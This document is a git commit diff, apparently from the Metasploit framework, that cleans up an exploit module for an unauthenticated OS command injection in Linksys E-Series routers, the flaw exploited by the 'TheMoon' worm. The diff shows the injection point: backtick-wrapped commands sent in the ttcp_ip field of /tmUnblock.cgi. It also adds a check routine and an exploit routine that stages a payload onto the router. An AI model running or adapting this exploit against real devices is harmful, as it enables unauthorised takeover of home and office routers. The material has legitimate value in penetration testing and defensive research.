Code clean up

jvazquez-r7 · jvazquez-r7 · commit 0ae75860ea27 · 2014-04-04T14:02:12.000-05:00
diff --git a/modules/exploits/linux/http/linksys_themoon_exec.rb b/modules/exploits/linux/http/linksys_themoon_exec.rb
@@ -15,14 +15,11 @@ def initialize(info = {})
     super(update_info(info,
       'Name'        => 'Linksys E-Series TheMoon Remote Command Injection',
       'Description' => %q{
-          Some Linksys E-Series Routers are vulnerable to an unauthenticated OS command
-        injection. Since it is a blind os command injection vulnerability, there is no
-        output for the executed command when using the cmd generic payload. A ping
-        command against a controlled system could be used for testing purposes. This
-        vulnerability was used from the so called "TheMoon" worm. There are many Systems
-        that might be vulnerable:
-        E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000, E900. This
-        module was tested against a E1500 v1.0.5.
+        Some Linksys E-Series Routers are vulnerable to an unauthenticated OS command
+        injection. This vulnerability was used from the so called "TheMoon" worm. There
+        are many Linksys systems that might be vulnerable including E4200, E3200, E3000,
+        E2500, E2100L, E2000, E1550, E1500, E1200, E1000, E900. This module was tested
+        successfully against an E1500 v1.0.5.
       },
       'Author'      =>
         [
@@ -86,33 +83,39 @@ def execute_command(cmd, opts)
           "ttcp_ip" => "-h `#{cmd}`",
           "StartEPI" => "1"
         }
-      })
+      }, 2)
       return res
     rescue ::Rex::ConnectionError
-      vprint_error("#{peer} - Failed to connect to the web server")
-      return nil
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
     end
   end
 
-  def exploit
-    print_status("#{peer} - Trying to access the vulnerable url")
+  def check
     begin
       res = send_request_cgi({
         'uri'     => '/tmUnblock.cgi',
-        'method'  => 'GET',
+        'method'  => 'GET'
       })
-      if res.nil? or res.code == 404
-        fail_with(Failure::NoAccess, "#{peer} - Access to the vulnerable URL is not possible")
-      end
-      if [200, 301, 302].include?(res.code)
-        print_good("#{peer} - Successfully accessed the vulnerable url")
-      else
-        fail_with(Failure::NoAccess, "#{peer} - Access to the vulnerable URL is not possible")
+
+      if res && [200, 301, 302].include?(res.code)
+        return Exploit::CheckCode::Detected
       end
     rescue ::Rex::ConnectionError
-      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+      return Exploit::CheckCode::Unknown
     end
 
+    Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    print_status("#{peer} - Trying to access the vulnerable URL...")
+
+    unless check == Exploit::CheckCode::Detected
+      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
+    end
+
+    print_status("#{peer} - Exploiting...")
     execute_cmdstager
   end
+
 end
